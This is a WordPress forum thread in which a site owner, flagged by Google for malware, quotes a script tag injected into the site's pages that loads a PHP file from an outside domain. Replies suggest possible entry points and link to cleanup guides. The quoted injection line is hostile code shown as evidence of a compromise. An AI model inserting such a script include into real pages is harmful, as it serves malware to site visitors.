?? Security Bug

  • cwebster1234

    (@cwebster1234)


    14 years, 4 months ago

    Hi,

    had an email from google today which indicated that my site was a distributer of malware or linked to a site connected to malware. On looking through the code of the pages I can see the following

    <script src=http://redspider-systems.com/securitycode/incEditSTLeasingUnit.php ></script>

    just after the closing head tag.

    Any ideas how this could have happened. Is there an easy way to fix and prevent this occurring?

    cheers
    Craig

Viewing 2 replies - 1 through 2 (of 2 total)
  • alism

    (@alism)

    14 years, 4 months ago

    The hack may have been made possible through failure to keep your version of WordPress up to date, or another, non-WordPress script within your webspace that’s insecure. Or through shared hosting. Or of course, a non-public WordPress exploit.

    Don’t forget, if you’ve been a bit slack updating, even in the distant past, in may have come back to bite you on the arse if a backdoor has been set up and just not used until now.

    So there’s a few possibilities. Have a look at your server logs for suspicious activity and you might be able to identify the point of entry.

    This link should also help you get cleaned up.
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    adiant

    (@adiant)

    14 years, 4 months ago

    http://codex.wordpress.org/FAQ_My_site_was_hacked is also a great place to start reading.

    Another access point to your site by hackers is created if any workstation (“personal computer”) exists that has the FTP ID and password on it (e.g. – in an FTP client), and was ever infected with malware. Some malware looks for and sends all FTP IDs and passwords to a hacker repository on the Internet for later use.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘?? Security Bug’ is closed to new replies.

Tags